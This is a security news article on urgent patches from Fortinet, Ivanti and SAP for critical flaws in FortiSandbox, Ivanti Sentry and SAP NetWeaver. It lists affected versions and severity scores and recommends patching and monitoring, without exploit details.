Major enterprise software vendors Fortinet, Ivanti, and SAP have released urgent security updates addressing multiple critical vulnerabilities that could enable remote code execution, privilege escalation, and sensitive data exposure across widely used enterprise systems.
The flaws, some carrying near-maximum severity ratings, affect cloud services, network security appliances, and enterprise resource planning platforms used globally.
Fortinet fixes critical command injection flaw
Security vendor Fortinet has patched a high-severity vulnerability in its FortiSandbox product line, tracked as CVE-2026-25089 with a CVSS score of 9.1.
The flaw stems from improper input sanitization in the system’s web interface, allowing an unauthenticated attacker to execute system commands through specially crafted HTTP requests.
The vulnerability affects multiple versions of:
- FortiSandbox (5.0.0–5.0.5)
- FortiSandbox Cloud (5.0.4–5.0.5)
- FortiSandbox PaaS (5.0.4–5.0.5)
Fortinet has urged customers to upgrade to patched versions to prevent potential remote exploitation.
Ivanti patches two critical zero-day level flaws
Enterprise security provider Ivanti has released fixes for two severe vulnerabilities in Ivanti Sentry (formerly MobileIron Sentry), both of which could allow full system compromise.
The vulnerabilities include:
- CVE-2026-10520 – A command injection flaw that could enable unauthenticated attackers to gain root-level remote code execution
- CVE-2026-10523 – An authentication bypass issue allowing attackers to create administrative accounts without credentials
Security researchers reported that the command injection issue could be triggered via a specially crafted HTTP request targeting a vulnerable API endpoint, which is then processed by backend system components.
Ivanti confirmed that its patch not only removes access to the vulnerable endpoint but also strengthens authentication controls to prevent unauthorized access attempts.
SAP addresses multiple enterprise system vulnerabilities
Enterprise software giant SAP has released security updates for four high-severity vulnerabilities affecting SAP NetWeaver and related platforms.
The vulnerabilities include:
- XML signature wrapping flaw in SAML authentication (CVSS 9.9)
- Memory corruption issue in SAP Application Server ABAP (CVSS 9.8)
- Security weakness in SAP Commerce Cloud and Data Hub components
- Directory traversal vulnerability in SAP NetWeaver Java Web Container
Security researchers warn that these flaws could allow attackers to manipulate authentication processes, access sensitive data, or disrupt enterprise applications if exploited.
No active exploitation reported, but risk remains high
Although there is currently no confirmed evidence of active exploitation in the wild, cybersecurity experts stress that organizations should patch immediately due to the severity of the vulnerabilities and the widespread use of affected systems.
Security analysts warn that enterprise platforms like Fortinet, Ivanti, and SAP are frequent targets for threat actors due to their exposure in corporate networks and critical business environments.
Urgent call for patching and risk mitigation
Experts recommend that organizations:
- Apply vendor patches without delay
- Restrict exposure of administrative interfaces
- Monitor for unusual authentication or command execution attempts
- Review logs for signs of reconnaissance activity
With attackers increasingly automating exploitation of newly disclosed vulnerabilities, security professionals caution that even short delays in patching can significantly increase exposure risk.
